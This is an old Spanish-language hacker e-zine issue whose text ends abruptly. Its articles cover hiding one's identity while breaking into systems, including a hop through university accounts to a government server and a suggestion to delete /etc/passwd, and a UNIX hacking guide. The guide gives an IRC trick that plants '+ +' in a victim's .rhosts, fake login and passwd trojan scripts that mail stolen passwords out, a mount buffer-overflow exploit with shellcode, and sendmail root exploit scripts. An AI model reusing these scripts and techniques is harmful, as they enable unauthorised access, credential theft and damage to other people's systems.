RareGaZz nº3:(RARE003.TXT):12/12/1999 << Back To RareGaZz nº 3
El Grupo Revolucionarios del KaoS presenta \./\./ RAREGAZZ \./\./ Año 1, Numero 3 ~~~~~~~~~~~~~~~ "They got the guns but...we got the numbers" Contenido 1.- Como permanecer UNDERGROUND en Internet. -KillerBot- 2.- Miscelanea sobre los Hackers. -DuvaHazard- 3.- La guia definitiva para Hackear UNIX. -Raven Spirit- 4.- El Bug de SendMail. -Dark Raver- 5.- Los Bugs de Internet Explorer. 6.- Errores en la seguridad de WINDOWS 95. 7.- Kevin Mitnick, La Leyenda. 8.- L3T2 HACK! -RdK- 9.- Nuevas Tecnologias -Anonimo- 10.- CTRL + ALT + DEL 11.- Primer Concurso de RareGaZz Para enviar colaboraciones o comentarios existen estas direcciones RAREGAZZ@BIGFOOT.COM RAREGAZZ@GEOCITIES.COM Si deseas contactar a la persona que ensambla el magazine RARETRIP@CYBERDUDE.COM RAREGAZZ CUENTA CON SU SITIO EN LA RED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.geocities.com/Baja/4426 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- * INTRODUCCION * Un saludo a todos y disculpas por habernos tardado tanto en terminar de ensamblar este E-mag pero me gustaria hacerles esta pregunta: ¿Cuanto tardarian ustedes en hacer una pagina html como la de la revista, Encontrar buenos Links y WareZ, coordinar 4 personas para realizar distintas tareas y aparte de esto gastar un poco de tiempo hackeando la red? Gracias, sabia que entenderian. Por otra parte en este numero tenemos varios scripts para unix, pero ahora nos hacen falta algunos para IRC que han sido muy solicitados. Si alguno de ustedes cuenta con uno efectivo no duden en enviarlo a la editorial para cooperar en la realizacion de este magazine. Espero disfruten tanto RareGaZz como nosotros hemos disfrutado creandolo. RareTrip -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ┌───────────────────────────────────────────┐ │ ¿COMO PERMANECER UNDERGROUND EN INTERNET? │ │ KillerBot │ └───────────────────────────────────────────┘ Si queremos permanecer en el anonimato mientras nos relacionamos con otras personas en la red es necesario ser muy cuidadoso y evitar cometer algunos errores que podrian revelar nuestra identidad a la persona con la que queramos comunicarnos. Los requisitos para permanecer Underground (bajo tierra) son los siguientes: -Tener una cuenta de E-mail Anonima (Hotmail) -Aprender a usar los remailers -Usar encripcion -Usar Esteganografia -Usar el servicio de www.anonymizer.com para entrar a sistemas como Hotmail. -Hackear con Proteccion (Condon) CUENTAS ANONIMAS DE EMAIL ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ La parte mas importante de un Hacker es mantener comunicacion segura usando el correo electronico. Cuando queramos recibir correo anonimo sin revelar nuestra cuenta personal se recomienda que uses hotmail siempre y cuando revises el correo usando el anonimizador para evitar que ellos sepan tu direccion IP. Otra forma de recibir correo sin revelar nuestra cuenta es usando los remailers. Los remailers nos permiten generar direcciones anonimas para que otros se comuniquen con nosotros llamadas ARAS. Para generarlas es necesario contar con el programa PGP y las llaves publicas de los remailers a usar. Las llaves publicas y el programa para crear las ARAS estaran disponibles en la pagina de RareGaZz que mantiene RareTrip en la seccion de WareZ muy pronto. Las ARAS se crean usando un programa especial y su modo de uso es muy facil. Digamos que ustedes quieren enviar un mensaje a RAREGAZZ@BIGFOOT.COM pero no se saben la direccion, lo unico que tienen es la siguiente ARA --> Anonymous Return Addres: Copy the material between the "cut here" lines below and put it at the top of your reply message, then send the message to: remailer@huge.cajones.com vvvvvvvvvvvvvvvvvvvvvvv cut here vvvvvvvvvvvvvvvvvvvvvvv :: Encrypted: PGP -----BEGIN PGP MESSAGE----- Version: 2.6.2 hIwD3DcuVanRWD0BBACV8kr+ortb/IvAP2s0sLZJkDvRa7oKWB3n9Fq2Y6/B67qc YZIAxFRlFv/myHs2a6wxQRGSYjYcWHJ6YK6YNho075cuWdwDAv/DrK9+k3WcTZj/ sxiIjR7PjnlFktj9oy9aWHz6uapr5t2826CsE+x35M/EFQcL5JtE/Gz+KvX/XKYA AABP1EonU3d81egJv0t8qk86xSoD5T6cLAG7+KiFvZLc+ySdlmfsqGGWmS/skQEL 8PJq5QDXF03ZfdPgKVnuXI42amjepBboUemucN6wphKXHg== =4GQy -----END PGP MESSAGE----- Aqui escribes el mensaje. ^^^^^^^^^^^^^^^^^^^^^^^ cut here ^^^^^^^^^^^^^^^^^^^^^^^ Siguiendo las instrucciones solo es necesario copiar el texto entre las ^ y enviarlo a el remailer remailer@huge.cajones.com al principio del mensaje y el remailer interpretara las instrucciones y enviara el texto debajo de la ARA a la direccion destino anonima. Para una mayor efectividad de las ARAS es necesario encadenar por lo minimo 2 remailers. REMAILERS ▀▀▀▀▀▀▀▀▀ Los remailers son sistemas dedicados unicamente a recibir mensajes de correo, borrar la informacion del remitente y volverlo a enviar a la persona especificada por el usuario. Antes de usar cualquier remailer debes de pedir el archivo de ayuda con el siguiente comando en el subject de un mensaje dirigido a el remailer: Remailer-Help Algunos remailers que en estos momentos estan en uso son: REMAILER@HUGE.CAJONES.COM <--- En servicio REMAILER@CYPHERPUNKS.CA <--- En servicio MIXMASTER@REMAIL.OBSCURA.COM <--- Escribe solicitando el archivo HELP DUSTMAN@ATHENSNET.COM <--- Escribe solicitando el archivo HELP MIDDLEMAN@CYBERPASS.NET <--- Escribe solicitando el archivo HELP REMAILER@WAZZO.COM <--- Escribe solicitando el archivo HELP REMAILER@HIDDEN.NET <--- Escribe solicitando el archivo HELP Los remailers permiten 'encadenarlos' para hacer el trazeado de un mensaje mucho mas dificil. Encadenar significa enviar un mensaje a un remailer con instrucciones para que este lo envie a otro, y el ultimo finalmente al destinatario. El comando para que el remailer envie el mensaje debera estar en la primera linea del cuerpo del mensaje y debera ser asi: Request-Remailing to: direccion@de.correo.mx Despues de esa linea se incluye el mensaje a enviar. Un ejemplo de encadenamiento de remailers es el siguiente: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - To: remailer@huge.cajones.com From: alguna@persona.sk Request-Remailing to: remailer@cypherpunks.ca Request-Remailing to: raregazz@bigfoot.com Mensaje anonimo! - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Ahora imaginate que el operador de tu sistema sospecha de ti y revisa cualquier mensaje que envies ¿Como protegerte y a la vez proteger al que envias el mensaje? Respuesta: ¡USANDO PGP PARA USAR EL REMAILER! Los remailers tienen la capacidad de aceptar el mensaje y las instrucciones de envio totalmente encriptadas con su llave pgp lo que hace imposible para cualquier persona saber a quien va destinado el mensaje y el contenido del mismo. Las llaves pgp de los remailers y las instrucciones de uso puedes conseguirlas enviando un mensaje al remailer con el subject "Remailer-Help". Checa nuestra pagina WEB y proximamente aparecera el programa SEND.EXE creado por RareTrip para hacer el uso de los remailers mucho mas facil. Ademas el programa permitira crear ARAS automaticamente, entre otras cosas. ENCRIPCION ▀▀▀▀▀▀▀▀▀▀ Este tema ya lo describio raretrip en el numero 2 de RareGaZz asi que solo me queda darles la ¡IMPORTANTE! noticia de que a peticion mia el programa PGP (216k) ya esta disponible sin problemas en el siguiente link: http://www.geocities.com/Baja/4426/CRYPT.ZIP (es importante que el nombre este en mayusculas) Este ZIP contiene CRYPT.EXE que pregunta por el siguiente password: pgpprg Por favor noten que en ningun lado de nuestra pagina dice que tenemos PGP asi que tendran que copiar el link a su navegador y bajarlo. Ademas es muy importante mencionar que *NO* estara disponible permanentemente asi que cuando termines de leer este texto inmediatamente bajalo para proteger tu privacidad. Fecha limite: 25 de Junio de 1997. ESTEGANOGRAFIA ▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Esta tecnica consiste en 'esconder' archivos o mensajes en algun archivo aparentemente sin importancia. Generalmente se esconden en archivos graficos de baja calidad y blanco & negro evitando imagenes geometricas para que no se note que un archivo se encuentra escondido. Cuando se esconden en archivos de sonido deben ser WAVS de baja calidad para que no se note que ese archivo contiene otro. Un buen programa que permite esto lo puedes encontrar en nuestra pagina en la seccion de WareZ o escribe este link: http://www.geocities.com/Baja/4426/STEGANOS.ZIP ANONYMIZER ▀▀▀▀▀▀▀▀▀▀ Este servicio evita que tu direccion IP aparezca en los logs del servidor al que te conectes ya que te asigna una direccion IP falsa. Es muy util para ingresar a sitios WWW donde sea indispensable esconder tu procedencia e identidad como por ejemplo a Hotmail. La direccion de este servicio es: http://www.anonymizer.com HACKEA CON CONDON ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Esto significa que cuando quieras hackear algun sistema usando Telnet y FTP pongas barreras entre tu y el sistema objetivo. En el siguiente diagrama se muestra un hacker sin proteccion: ┌─────────┐ ┌──────────┐ │ hacker ├───────────┤ objetivo │ └─────────┘ └──────────┘ Ahora aqui se muestra un Hacker con algo de experiencia: ┌──────────┐ ┌───────────┐ │ hacker ├──────────┤ condon #1 │ └──────────┘ └─────┬─────┘ │ │ ┌─────────┐ ┌────┴─────┐ │objetivo ├───────────┤condon #2 │ └─────────┘ └──────────┘ Supongamos que tienes la cuenta R00T y se te ocurre borrar el /etc/passwd o el /etc/shadow para sacar de circulacion a los usuarios de ese servidor por un buen tiempo pero tienes miedo que puedan rastrearte. La solucion es simple. Cuando realizas una conexion en Internet no la haces directamente sino que pasas por una serie de servidores que finalmente te hacen llegar a tu objetivo, por lo que si realizas una conexion protegida como el ejemplo imaginate cuantos sistemas tendrian que investigar para finalmente llegar a ti. Como puedes darte cuenta, agarrarte es imposible. Ahora te presento un ejemplo de conexion Protegida Si quisieramos poner el codigo fuente del script ZAP.C en el sistema objetivo (mexico.gob.mx) usando como proteccion los sistemas condon1 (itesm.mx.edu) y condon2 (unam.mx.edu) tendriamos que sabernos por lo menos el login y password de la cuenta GUEST y conocer un directorio donde podamos escribir en cada uno de estos sistemas (generalmente /incoming /tmp /temp). Ahora, supongamos que nuestro script esta en /usuarios/pepe/zap.c [ Los caracteres pegados al inicio del texto son outputs del sistema ] % ftp ftp> open itesm.mx.edu UNIX v.4.5 Login: guest Password: xxxxxx Bienvenido a ITESM.MX.EDU COMMAND? ftp> put /usuarios/pepe/zap.c /incoming/zap.c Transfer File Complete % open unam.mx.edu IRIS v.3.5 Please Login Login: guest Password: xxxx Bienvenido al sistema de la Universidad de BLAH BLAH ftp> put /incoming/zap.c /temp/zap.c Archivos Recibidos! ftp> open mexico.gov.mx Este sistema es para uso del gobierno unicamente, cualquier persona que sea sorprendida usando una cuenta que no le pertenezca sera perseguida. Login: zedillo Password: xxxxxxxx Bienvenido! ftp> put /temp/zap.c /tmp/zap.c ftp> close connection closed ftp> close connection closed ftp> close connection closed ftp> quit Espero hayan entendido el ejemplo anterior, no significa que lo hagan igual pero es una idea que me ha servido de mucho. En algunos casos sustituye el comando PUT por SEND. Ahora para compilar ese script con el mismo nivel de proteccion necesitas realizar lo mismo pero con conexiones Telnet. % telnet itesm.mx.edu UNIX v.4.5 Login: guest Password: xxxxxx Bienvenido a ITESM.MX.EDU COMMAND? % telnet unam.mx.edu IRIS v.3.5 Please Login Login: guest Password: xxxx Bienvenido al sistema de la Universidad de BLAH BLAH % telnet mexico.gov.mx Este sistema es para uso del gobierno unicamente, cualquier persona que sea sorprendida usando una cuenta que no le pertenezca sera perseguida. Login: zedillo Password: xxxxxxxx Bienvenido! % cd /tmp % cc -o zap zap.c Compile Succesful! % zap Es todo por este numero y espero les sirvan de algo las sugerencias que les invito a usar para permanecer mas tiempo en la red sin ser detectado. Despues de todo ¿QUIEN QUIERE SER FAMOSO? Por ahora no revelare mi direccion de email a pesar de las peticiones por parte de raretrip pero la verdad es muy riesgoso en estos momentos. disculpen. KillerBot -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡ ║ Miscelanea Sobre Hackers ║ ║ por ║ ║ DuvaHazard ║ ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡ Despues de varios años de andar vagando por ese lugar del que todos hablan y al que todos van pero nadie ha visto, me he encontrado con gente ignorante que se hace llamar autoridad y piensa que lo sabe todo sin primero estar seguro de ello. Esta va dedicada con cariño a todos aquellos de la prensa inutil (porque la hay util) y a los medios de comunicacion que confunden lo que es un Cracker y un Hacker. Son documentos que encontre por ahi, pero pues como no todos nacemos hablando ingles, ahi les va en el idioma de Cervantes: CRACKER ~~~~~~~ La definicion de un cracker es alguien que intenta entrar a un sistema por la via de crackear/adivinar claves de acceso de usuarios. La mayoria de los crackers son jovenes adolescentes que son bastante maliciosos y buscan divertirse destruyendo o alterando la informacion de un sistema. Los medios de comunicacion muy frecuentemente confunden a el cracker con el hacker. Notese tambien que el nivel de educacion/inteligencia del cracker acerca del sistema y su funcionamiento interno etc. es muy bajo. HACKER ~~~~~~ Del otro lado el hacker es el individuo que anhela el conocimiento. Los hackers son individuos muy sabios. Numerosas veces saben varios lenguajes de programacion, trabajan extensivamente con las entrañas y el exterior de UNIX, tienen una firme comprension sobre todas las implementaciones y protocolos de TCP/IP. Se mantienen actualizados en todos los temas de seguridad que involucren computadoras. Entrar a un sistema para un hacker es una aventura, una emocion, es un reto que pueden enfrentar. El hacker obtiene bastante excitacion al explorar el sistema desde el interior/exterior buscando vigorosamente malas configuraciones, bugs(fallas), y hoyos en el sistema operativo que los permitieran entrar a una maquina. Una vez en el sistema el reto ha sido acompletado y han triunfado en entrar. Es contra la etica de los hackers alterar cualquier informacion excepto los archivos de bitacora (log files) que son necesarios para limpiar sus huellas. No tienen necesidad ni deseo de destruir informacion como los maliciosos crackers. Estan ahi para explorar el sistema y aprender mas. El hacker tiene un deseo constante y sed de conocimiento que crece intensamente conforme su aventura progresa. CandyMan candyman@mcs.com http://www.mcs.net/~candyman/ @ NOTA @ ===--- Este articulo aparecio en PCNoticias del Año 2 #17 @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@# ===========---------------- Accesorios de los Hackers ----------------=========== @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@# Ademas de un modo comun de vestir, hay ciertas prendas o herramientas que un hacker puede traer cargando. Muchas veces utilizan una mochila negra (aunque varias son verdes para combinar con las botas militares de algunos) llena hasta reventar de cosas que los hackers deben tener para sostener sus vidas de hacker cuando son separados de sus computadoras. Un inventario total podria ser como este: -Libreta (tamaño normal y otro) -Multiples lapices y plumas -Varios desarmadores, llaves (para instalar tarjetas, y abrir gabinetes) -La calculadora programable mas increible que la persona pudo encontrar. Estas tienden a las unidades HP {RPN}, pero hay una substanciosa minoria usando unidades algebraicas Casio. Estas deben graficar si del todo posible. -Diskettes. Una variedad de diskettes con programas de diagnostico, un proyecto actual que transporta a una maquina nueva, o los ultimos programas adquiridos para jugar un rato con ellos. -Cochinero. Y bastante. Examenes viejos, impresiones de codigo fuente, cuentas sin pagar, pedazos de papel con notas sobre ideas de programas. Numeros IP, y numeros de telefono, etc... -Una buena navaja de bolsillo. Sobresalen las navajas Suizas con varias cochinadas. -Un instrumento musical. Las harmonicas dominan esta categoria, aunque se dan casos en que algunos traen silvatos. -Un multiprobador -Hackers monetariamente mas equipados tambien pueden ser vistos con computadoras portatiles, Apple Newtons u otros PDAs. Un hacker muy bien equipado puede seguir sumergido en su trabajo durante una lectura aburrida o mientras va en el autobus. ---> DUVAHAZARD@HOTMAIL.COM <--- http://www.dynamo.com.mx/DUVAHAZARD/ [ Este texto fue enviado a nosotros por el creador de los mismos asi que no estamos pirateando a PcNoticias ademas la diferencia entre las revistas es enorme, primeramente RareGaZz es 100% amigable con el ambiente ya que no perjudicamos ningun arbolito. Ya empezamos las pruebas para ver si RareGaZz tambien puede ser leido en el baño y salieron favorables en los sistemas NoteBook pero totalmente desastrosos con las Pc caseras. Esten pendientes mientras solucionamos este Bug de la revista... :-) ] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- +-+-+-+-+-+-+-+-++-+-+-+-+-+ | La guia definitiva para | + Hackear UNIX + | * Raven Spirit * | +-+-+-+-+-+-+-+-++-+-+-+-+-+ Hola a todos. Espero que los que leais este documento comprendais como se hackea un unix. En mis frecuentes visitas al IRC mucha gente pregunta sobre el /etc/passwd, mucha gente anda buscando diccionarios de palabras y otros tantos buscan el mejor crackeador. ¿ para que ?. Hay maneras mucho mas rapidas y por supuesto divertidas de conseguir una cuenta. Y por supuesto es demasiado dificil desencriptar la cuenta del root, por lo que solo se utiliza en casos extremos, los programas tipo dictmake solo se usan en casos muy raros y cuando no nos queda otro recurso. Empezamos. Antes de empezar me gustaria que quedara claro que si quereis ser hackers en serio necesitais linux, no es absolutamente necesario pero facilita muchisimo las cosas. Para hackear un unix la primera cosa que necesitamos es, logico, introducirse en el sistema. Algunos otros ordenadores tienen ftp's anonimos a los que podemos acceder, pero hacedme caso, no servira para nada. Para introducirnos en un sistema necesitamos que tenga al menos una parte de acceso publico. Generalmente esa parte es la famosa pantalla " Login: y Password: " que me imagino que todos conocereis. Esta pantalla simplemente vale para identificar que la entrada de un usuario en ese sistema sea legitima. Sin embargo esas tontas maquinas que solo saben la diferencia entre 0 y 1 si les damos un login y password que esten dados de alta en ese sistema nos dejara pasar ( a no ser que tengan un sistema de reconocimiento de IP para lo que necesitariamos hacer IP-Spoofing, pero esto solo nos ocurrira en ciertos ordenadores de alta seguridad ). ¿Como conseguir acceso al sistema? La manera mas facil, la ingenieria social. No creo que haga falta explicar eso. Simplemente podeis utilizar el comando finger, para los que useis linux y los que no usais el finger del mIrc. Este comando nos dara informacion sobre el titular del e-mail que nostros le demos, que segun la maquina sera, o mas o menos o a veces nada. Menos da una piedra. Si estais desde linux podeis usar comandos "r" como "rlogin loquesea.com -l loginquesea" esto os mete en el sistema, pero hay que conseguir una cuenta para poder usar los exploits que explicaré mas adelante. Sin embargo hay otras maneras de conseguir acceso al sistema, como por ejemplo la que explico ahora COMO ACCEDER A UN ORDENADOR HACKEANDO DESDE EL IRC: Esto solo lo podeis hacer desde linux, yo lo he probado desde win95 y 3.1 y no lo he conseguido hacer. Primero hacemos un /whois #uncanalconmuchagente para encontrar si hay alguien que se conecte desde un unix, que normalmente sera una universidad. El unico problema que tiene esto es que no podemos elegir el ordenador, pero de todas maneras es muy divertido. Lo unico que necesitamos es meter la cadena + + en su fichero /.rhosts y la verdad es que es una tonteria tremenda. Buscamos a la victima y vamos a un canal donde este el, despues le hablaremos desde un privado. Ahora entra la imaginacion de cada uno, porque tenemos que mandarle un fichero por DCC ( por ejemplo prueba.irc ) y que el escriba: /load prueba.irc Me imagino que vuestra imaginacion os ayudara a resolverlo. Lo primero es conseguir el fichero prueba.irc. Solo esta linea : /exec echo: "/exec echo + + > $HOME/.rhosts >> prueba.irc Ya tenemos el fichero prueba,lo mejor es que para que no se de cuenta podemos añadirle alguna conachada que se nos ocurra ( alla cada uno se las apañe ). Listo. Cuando el tio en cuestion escriba /load prueba.irc nosotros ejecutamos % rlogin ordenador_de_la_victima.com -l login_de_la_victima Ya estamos dentro. Facil ¿ No ? Y para terminar un truquillo que quizas os valga para algo, simplemente cambiamos la paridad de nuestro modem a 7E1 y telneteamos al ordenador en cuestion. Si hemos tenido suerte, cuando alguien intente conectarse, nos "colaremos" en su lugar. Despues de todo esto se supone que ya estamos dentro. Ahora hay que, o sacar una cuenta si no la tenemos o conseguir privilegios de root. Para lo primero: - Podemos usar el archirenombrado /ect/passwd ( si tenemos privilegios para leerlo ) y crackearlo pero si quereis mi consejo solo usad el fichero passwd para conseguir una cuenta cualquiera en el sistema y poder ejecutar comandos en el, poder usar un bug o exploit. - Usar un trojan o Caballo De Troya, esta opcion tambien requiere tiempo pero por supuesto menos que crackear el fichero passwd, por que funciona en cuanto cualguier usuario se conecte al sistema. ATENCION, si conseguimos la cuenta del root nos podremos saltar el paso "conseguir privilegios de root", aunque los sysadmins, algunos, pueden sospechar aunque la verdad es que despues de hackear durante un tiempo te das cuenta de lo estupidos que pueden llegar a ser. Quizas sea una de las mejores formas. Un caballo de troya es un fichero que metido en el sistema hace que un usuario crea que ha introducido su password mal, pero en realidad el password es enviado a la direccion de correo que nosostros le digamos. Aqui incluyo uno, pero acordaos de ponerle la direccion a la que quereis que os mande el passwd, y ademas en algunos sistemas en lugar de "Login:" nos dice : "marte login: " o algo distinto de login, por lo que tambien lo tenemos que cambiar para que nadie note la diferencia. Este es : ------SCRIPT------ #!/bin/sh rm -rf $0 cp $HOME/.login $HOME/.l echo ''>$HOME/.hushlogin echo "stty intr '^@' echo 'Login incorrect' echo -n 'login: ' echo $<>.t echo -n 'Password: ' stty -echo echo $<>>.t mail tunombre@tudirecciondecorreoanonima<.t rm .t cat /etc/motd mv .l .login rm .hushlogin stty echo source .login">$HOME/.login ----END SCRIPT---- Este tipo de scripts tambien se pueden usar en /bin/passwd, para cuando un usuario cambie su contraseña pero el problema es que no es muy normal que un usuario cambie su contraseña, o por lo menos pasa muy de vez en cuando. Para mayor seguridad lo mejor es poner el que esta arriba,( para el caso es mejor poner los dos ) pero sin embargo aqui pongo el otro, por si acaso ( acordaos de la direccion de correo ) : ------SCRIPT------ #!/bin/tcsh echo -n "Changing password for $USER on ";hostname echo -n "Old password: " stty -echo echo $<>$HOME/.tym echo "" echo -n "New password: " echo $<>>$HOME/.tym echo "" stty echo mail tunombre@tudirecciondecorreoanonima<$HOME/.tym rm $HOME/.tym echo "Error: Incorrect Password" rm -f $0 unalias /bin/passwd unalias passwd ---END SCRIPT--- La ventaja que tienen estos dos scripts es que no influye que el fichero passwd este shadowed o no. Creo que con esto nos llega para conseguir una cuenta en un ordenador normal. Pasamos a lo siguiente, conseguir los privilegios de root. Para conseguir privilegios de root en un sistema NO hace falta desencriptar la cuenta del root del fichero passwd. Para ser root recurrimos a los bugs y a los exploits. Los bugs son "agujeros" en el diseño del SSOO y se suelen encontrar en listas de correo de seguridad, aunque hay algunas webs donde estan recopilados. Los exploits son programas que utilizan esos bugs para conseguirnos privilegios de root, aunque no es para lo unico que sirven, me refiero a que podemos usar un exploit para leer el correo de alguien, para ocultar lo que estemos haciendo en el ordenador etc... Los exploits son ficheros de codigo .c que hay que compilar en el ordenador a hackear. Se meten por ftp y se compilan: % cc -o loquesea loquesea.c % loquesea Listo. Hay algunos que requieren una manera especial de utilizacion, pero lo indica claramente si editamos el fichero. Los bugs y exploits suelen estar clasificados por sistemas, para que sea mas facil localizarlos. La verdad es que os recomiendo tener los exploits y bugs en vuestro ordenador ordenados por directorios, para que no perdais el tiempo la paciencia buscandolos. Para que tengais alguna ayuda os voy a poner aqui unos cuantos: Quizas este ya lo conozcais, es el mount, y funciona en casi todos los linux: <-------------------------------------CORTAD AQUI---------------------------> /* Mount Exploit for Linux, Jul 30 1996 Discovered and Coded by Bloodmask & Vio Covin Security 1996 */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); } <--------------------------------------FINAL--------------------------------> Este otro exploit os dara un shell de root en los ordenadores que usen el sendmail 8.6.4, este es el codigo original, leed las lineas que empiecen por # porque es lo que teneis que escribir vosotros por que es distinto en cada sistema: <--------------------------------CORTAD AQUI--------------------------------> # location of sendmail SENDMAIL=/usr/lib/sendmail # location of original sendmail.cf file CONFIG=/nau/local/lib/mail/sendmail.cf #CONFIG=`strings $SENDMAIL | grep sendmail.cf` # program to execute as root SHELL=/bin/csh TEMPDIR=/tmp/sendbug-tmp.$$ mkdir $TEMPDIR chmod 700 $TEMPDIR cd $TEMPDIR cp $SENDMAIL sm chmod 700 sm echo "Creating setid0 ..." cat > setid.c << _EOF_ /* set uid to zero, thus escaping the annoying csh and solaris sh * problem.. * * if (getuid() != geteuid()) { * printf("permission denied, you root-hacker you.\n"); * exit(1); * } * * .. must be run euid 0, obviously. with no args it runs /bin/sh, * otherwise it runs the 1st arg. */ #include <stdio.h> main(argc, argv) int argc; char *argv[]; int uid; setuid(0); setgid(0); seteuid(0); /* probabally redundant. */ setegid(0); uid = getuid(); if (uid != 0) { printf("setuid(0); failed! aborting..\n"); exit(1); } if (argc !=2) { printf("executing /bin/sh...\n"); system("/bin/sh"); } else { printf("executing %s...\n", argv[1]); system(argv[1]); } _EOF_ cc -o setid0 setid.c echo "Creating calc..." cat > calc.c << _EOF_ /* * Determines offset in sendmail of * sendmail.cf file location. * author: timothy newsham */ #include <fcntl.h> gencore() int pid; int fd[2]; if(pipe(fd) < 0) { perror("pipe"); exit(1); return(0); } pid = fork(); if(!pid) { int f = open("./out", O_RDWR|O_CREAT, 0666); dup2(f, 1); dup2(fd[0], 0); close(f); close(fd[1]); close(fd[0]); execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0); perror("exec"); exit(0); } else { sleep(2); kill(pid, 11); } close(fd[0]); close(fd[1]); main(argc,argv) char **argv; int argc; unsigned int ConfFile,tTdvect,off; gencore(); sync(); /* grr. */ tTdvect = find("ZZZZZZZZ", "core"); ConfFile = find(argv[1], "core"); if(!tTdvect || !ConfFile) { return(1); } off = ConfFile - tTdvect; printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n", off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \ off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10); int find(pattern, file) char *pattern,*file; int fd; int i, addr; char c; fd = open(file, 0); i = 0; addr = 0; while(read(fd, &c, 1) == 1) { if(pattern[i] == c) i++; else i=0; if(pattern[i] == '\0') { addr -= strlen(pattern); return(addr); } addr++; } return(0); _EOF_ cc calc.c -o calc echo "Scanning core image for $CONFIG..." DEBUGFLAGS=`calc $CONFIG` echo "Creating alias.sh ..." echo "#!/bin/sh # this program will be executed when mail is sent to the fake alias. # since solaris sh and csh and tcsh refuse to run when euid != realuid, # we instead run the program we compiled above. /bin/chmod 6777 $TEMPDIR/setid0 /bin/chown root $TEMPDIR/setid0 /bin/sync " > alias.sh chmod 755 alias.sh echo "Creating fake alias file..." echo "yash: |$TEMPDIR/alias.sh" > aliases echo "Faking alias pointer in new config file..." egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf echo " # hacks follow OA/$TEMPDIR/aliases # our fake alias file Ou0 # user ID to run as Og0 # group ID to run as DZWHOOP-v1.0" >> /tmp/sm.cf echo "Creating the sendmail script..." cat > sendmail.script << _EOF_ helo mail from: <nobody> rcpt to: <yash> data yet another sendmail hole? suid whoop? \. # oops.. delete \ prior to execution quit _EOF_ echo "Executing $SENDMAIL $DEBUGFLAGS -bs..." $SENDMAIL $DEBUGFLAGS -bs < sendmail.script # give it time to execute. sleep 4 # cleanup in 5 seconds (sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) & if [ -u setid0 ] then echo "setid0 is a suid shell. executing..." cd / $TEMPDIR/setid0 /bin/csh echo "end of script." exit 0 else echo "setid0 is not suid; script failed." echo "apparently, you don't have the bug. celebrate :-)" exit 1 fi <----------------------------------FINAL-------------------------------------> Este otro os hara root en los ssoo con el sendmail 4.x <-------------------------------CORTAR AQUI----------------------------------> #!/bin/sh # Uso: smail <hostname> <target-user-name> <target-port> <shell command> # Defecto: smail <localhost> <daemon> <7001> </bin/sh> port=$3 user=$2 cmd=$4 if [ -z "$2" ]; then user=daemon fi if [ -z "$3" ]; then port=7002 fi if [ -z "$4" ]; then cmd="/bin/csh -i" fi ( sleep 4 echo "helo" echo "mail from: |" echo "rcpt to: bounce" echo "data" echo "." sleep 3 echo "mail from: $user" echo "rcpt to: | sed 